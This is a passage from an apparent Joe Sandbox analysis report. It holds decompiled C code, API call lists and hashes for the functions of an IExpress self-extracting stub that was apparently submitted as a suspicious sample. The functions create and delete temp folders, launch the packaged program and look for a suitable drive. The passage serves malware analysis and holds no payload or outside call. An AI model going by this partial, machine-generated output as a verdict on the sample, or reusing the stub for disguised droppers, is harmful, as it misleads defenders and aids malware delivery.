                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A954C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9556F
                                                                                                                                                                                                          • Part of subcall function 00A953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                          • Part of subcall function 00A953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                          • Part of subcall function 00A953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                          • Part of subcall function 00A953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                          • Part of subcall function 00A953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-186922987
                                                                                                                                                                                                        • Opcode ID: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                        • Instruction ID: 1a5339ee3879f4dccc142557a0bca129dfbf39e2eeaa8835f2345baf5bd5391e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68313571F00A01ABCF16AFB99D4697F73EBBB85340F16012BA906DA552DF70CE028785
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A92390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xa98004; // 0x6298f871
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00A96CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00A91680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00A916B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00A91680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00A916B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00A916B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00A9658A( &_v280, 0x104, 0xa91140);
								E00A92390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                        0x00a92398
                                                                                                                                                                                                        0x00a9239e
                                                                                                                                                                                                        0x00a923a3
                                                                                                                                                                                                        0x00a923a5
                                                                                                                                                                                                        0x00a923ae
                                                                                                                                                                                                        0x00a923b3
                                                                                                                                                                                                        0x00a924cb
                                                                                                                                                                                                        0x00a924d2
                                                                                                                                                                                                        0x00a924d3
                                                                                                                                                                                                        0x00a924d4
                                                                                                                                                                                                        0x00a924df
                                                                                                                                                                                                        0x00a923c2
                                                                                                                                                                                                        0x00a923d1
                                                                                                                                                                                                        0x00a923db
                                                                                                                                                                                                        0x00a923e4
                                                                                                                                                                                                        0x00a923f6
                                                                                                                                                                                                        0x00a923fc
                                                                                                                                                                                                        0x00a92401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92407
                                                                                                                                                                                                        0x00a92407
                                                                                                                                                                                                        0x00a92408
                                                                                                                                                                                                        0x00a92411
                                                                                                                                                                                                        0x00a9241f
                                                                                                                                                                                                        0x00a9247a
                                                                                                                                                                                                        0x00a92483
                                                                                                                                                                                                        0x00a92495
                                                                                                                                                                                                        0x00a924a3
                                                                                                                                                                                                        0x00a92421
                                                                                                                                                                                                        0x00a9242f
                                                                                                                                                                                                        0x00a92453
                                                                                                                                                                                                        0x00a9245d
                                                                                                                                                                                                        0x00a92466
                                                                                                                                                                                                        0x00a92472
                                                                                                                                                                                                        0x00a92472
                                                                                                                                                                                                        0x00a9242f
                                                                                                                                                                                                        0x00a924af
                                                                                                                                                                                                        0x00a924b5
                                                                                                                                                                                                        0x00a924be
                                                                                                                                                                                                        0x00a924c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a924c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00A98A3A,00A911F4,00A98A3A,00000000,?,?), ref: 00A923F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00A911F8), ref: 00A92427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00A911FC), ref: 00A9243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A92495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00A924A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A924AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00A924BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00A98A3A), ref: 00A924C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                        • Instruction ID: 651cd56c74a6c6e13e78586ee337725a317d368169a893b838fd471a5e2a8a37
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31316D32704641ABCB21EBA4DD89AEB73ECABC4305F14492FB59586290EF3499498792
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 a93fef-a94010 676 a9410a-a9411a call a96ce0 675->676 677 a94016-a9403b CreateProcessA 675->677 678 a94041-a9406e WaitForSingleObject GetExitCodeProcess 677->678 679 a940c4-a94101 call a96285 GetLastError FormatMessageA call a944b9 677->679 682 a94091 call a9411b 678->682 683 a94070-a94077 678->683 691 a94106 679->691 690 a94096-a940b8 CloseHandle * 2 682->690 683->682 686 a94079-a9407b 683->686 686->682 689 a9407d-a94089 686->689 689->682 692 a9408b 689->692 693 a94108 690->693 694 a940ba-a940c0 690->694 691->693 692->682 693->676 694->693 695 a940c2 694->695 695->691
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00A93FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xa98004; // 0x6298f871
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00A96CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xa99124 = E00A96285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E00A944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xa98a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xa99a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xa99a2c = _t44;
						}
					}
				}
				E00A9411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xa99a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                        0x00a93fef
                                                                                                                                                                                                        0x00a93ffa
                                                                                                                                                                                                        0x00a94001
                                                                                                                                                                                                        0x00a94008
                                                                                                                                                                                                        0x00a9400a
                                                                                                                                                                                                        0x00a9400b
                                                                                                                                                                                                        0x00a94010
                                                                                                                                                                                                        0x00a9410a
                                                                                                                                                                                                        0x00a9411a
                                                                                                                                                                                                        0x00a9411a
                                                                                                                                                                                                        0x00a9401c
                                                                                                                                                                                                        0x00a9401d
                                                                                                                                                                                                        0x00a9401e
                                                                                                                                                                                                        0x00a9401f
                                                                                                                                                                                                        0x00a94033
                                                                                                                                                                                                        0x00a9403b
                                                                                                                                                                                                        0x00a940ca
                                                                                                                                                                                                        0x00a940e9
                                                                                                                                                                                                        0x00a940f8
                                                                                                                                                                                                        0x00a94101
                                                                                                                                                                                                        0x00a94106
                                                                                                                                                                                                        0x00a94106
                                                                                                                                                                                                        0x00a94108
                                                                                                                                                                                                        0x00a94108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94108
                                                                                                                                                                                                        0x00a94049
                                                                                                                                                                                                        0x00a9405c
                                                                                                                                                                                                        0x00a94062
                                                                                                                                                                                                        0x00a94068
                                                                                                                                                                                                        0x00a9406e
                                                                                                                                                                                                        0x00a94070
                                                                                                                                                                                                        0x00a94077
                                                                                                                                                                                                        0x00a9407f
                                                                                                                                                                                                        0x00a94089
                                                                                                                                                                                                        0x00a9408b
                                                                                                                                                                                                        0x00a9408b
                                                                                                                                                                                                        0x00a94089
                                                                                                                                                                                                        0x00a94077
                                                                                                                                                                                                        0x00a94091
                                                                                                                                                                                                        0x00a9409c
                                                                                                                                                                                                        0x00a940a8
                                                                                                                                                                                                        0x00a940b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a940c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a940c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 00A94033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A94049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00A9405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A9409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A940A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A940DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A940E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 89356e9aa8ef34b0c2d63b2346076741f8f8a11d1c687008f3e90c6f36733d21
                                                                                                                                                                                                        • Instruction ID: 649ba6ec411f29755cb86668b98fbbd553266052fdb9c4b67712aa9d0dc5b667
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89356e9aa8ef34b0c2d63b2346076741f8f8a11d1c687008f3e90c6f36733d21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E31AF31740208ABEF209BA5DC49FAB77B8EB98700F2002ABF505D2160CE344C83CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00A92BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xa9a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xa99124 = 0;
				if(E00A92CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00A92F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00A952B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xa98a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xa99a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00A91F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xa98588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa99124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                        0x00a92c03
                                                                                                                                                                                                        0x00a92c0d
                                                                                                                                                                                                        0x00a92c18
                                                                                                                                                                                                        0x00a92c20
                                                                                                                                                                                                        0x00a92c2e
                                                                                                                                                                                                        0x00a92c32
                                                                                                                                                                                                        0x00a92c36
                                                                                                                                                                                                        0x00a92c3d
                                                                                                                                                                                                        0x00a92c43
                                                                                                                                                                                                        0x00a92c45
                                                                                                                                                                                                        0x00a92c47
                                                                                                                                                                                                        0x00a92c49
                                                                                                                                                                                                        0x00a92c4e
                                                                                                                                                                                                        0x00a92c4e
                                                                                                                                                                                                        0x00a92c47
                                                                                                                                                                                                        0x00a92c32
                                                                                                                                                                                                        0x00a92c20
                                                                                                                                                                                                        0x00a92c50
                                                                                                                                                                                                        0x00a92c54
                                                                                                                                                                                                        0x00a92c57
                                                                                                                                                                                                        0x00a92c64
                                                                                                                                                                                                        0x00a92c66
                                                                                                                                                                                                        0x00a92c6b
                                                                                                                                                                                                        0x00a92c6d
                                                                                                                                                                                                        0x00a92c74
                                                                                                                                                                                                        0x00a92c76
                                                                                                                                                                                                        0x00a92c7c
                                                                                                                                                                                                        0x00a92c7e
                                                                                                                                                                                                        0x00a92c87
                                                                                                                                                                                                        0x00a92c89
                                                                                                                                                                                                        0x00a92c89
                                                                                                                                                                                                        0x00a92c87
                                                                                                                                                                                                        0x00a92c7c
                                                                                                                                                                                                        0x00a92c74
                                                                                                                                                                                                        0x00a92c8e
                                                                                                                                                                                                        0x00a92c95
                                                                                                                                                                                                        0x00a92c98
                                                                                                                                                                                                        0x00a92c98
                                                                                                                                                                                                        0x00a92c9e
                                                                                                                                                                                                        0x00a92ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A92C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                        • Instruction ID: c3084d0e2f996b7c77293d138436475bf63e07ca5546ba7a1a7f64fc9970671f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C11AC313012067BDF20ABF9AD89F6F37E9AB89391B05012BB901D7291DE31DC0287A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A96F40() {

				SetUnhandledExceptionFilter(E00A96EF0); // executed
				return 0;
			}



                                                                                                                                                                                                        0x00a96f45
                                                                                                                                                                                                        0x00a96f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A96F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                        • Instruction ID: 170315c71201bf958f06280dc98a750d9ff9d8ab52585a099303385348cc0bd0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4090026435111057DA105BB09D1941575D16E5D642B915962A011C4494DF6044415552
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A955A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 a955a0-a955d9 call a9468f LocalAlloc 235 a955db-a955f1 call a944b9 call a96285 232->235 236 a955fd-a9560c call a9468f 232->236 251 a955f6-a955f8 235->251 241 a9560e-a95630 call a944b9 LocalFree 236->241 242 a95632-a95643 lstrcmpA 236->242 241->251 245 a9564b-a95659 LocalFree 242->245 246 a95645 242->246 249 a9565b-a9565d 245->249 250 a95696-a9569c 245->250 246->245 254 a95669 249->254 255 a9565f-a95667 249->255 252 a9589f-a958b5 call a96517 250->252 253 a956a2-a956a8 250->253 256 a958b7-a958c7 call a96ce0 251->256 252->256 253->252 257 a956ae-a956c1 GetTempPathA 253->257 258 a9566b-a9567a call a95467 254->258 255->254 255->258 262 a956f3-a95711 call a91781 257->262 263 a956c3-a956c9 call a95467 257->263 270 a9589b-a9589d 258->270 271 a95680-a95691 call a944b9 258->271 275 a9586c-a95890 GetWindowsDirectoryA call a9597d 262->275 276 a95717-a95729 GetDriveTypeA 262->276 269 a956ce-a956d0 263->269 269->270 273 a956d6-a956df call a92630 269->273 270->256 271->251 273->262 288 a956e1-a956ed call a95467 273->288 275->262 289 a95896 275->289 280 a9572b-a9572e 276->280 281 a95730-a95740 GetFileAttributesA 276->281 280->281 282 a95742-a95745 280->282 281->282 283 a9577e-a9578f call a9597d 281->283 286 a9576b 282->286 287 a95747-a9574f 282->287 298 a95791-a9579e call a92630 283->298 299 a957b2-a957bf call a92630 283->299 291 a95771-a95779 286->291 287->291 292 a95751-a95753 287->292 288->262 288->270 289->270 296 a95864-a95866 291->296 292->291 295 a95755-a95762 call a96952 292->295 295->286 309 a95764-a95769 295->309 296->275 296->276 298->286 306 a957a0-a957b0 call a9597d 298->306 307 a957c1-a957cd GetWindowsDirectoryA 299->307 308 a957d3-a957f8 call a9658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 a9580a 308->314 315 a957fa-a95808 CreateDirectoryA 308->315 309->283 309->286 316 a9580d-a9580f 314->316 315->316 317 a95811-a95825 316->317 318 a95827-a9585c SetFileAttributesA call a91781 call a95467 316->318 317->296 318->270 323 a9585e 318->323 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00A955A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xa98004; // 0x6298f871
				_v8 = _t28 ^ _t110;
				_t2 = E00A9468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00A9468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xa99a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xa98b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xa98a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00A96517(_t82, 0x7d2, 0, E00A93210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xa99a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xa991e4;
									_t40 = GetTempPathA(0x104, 0xa991e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00A91781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
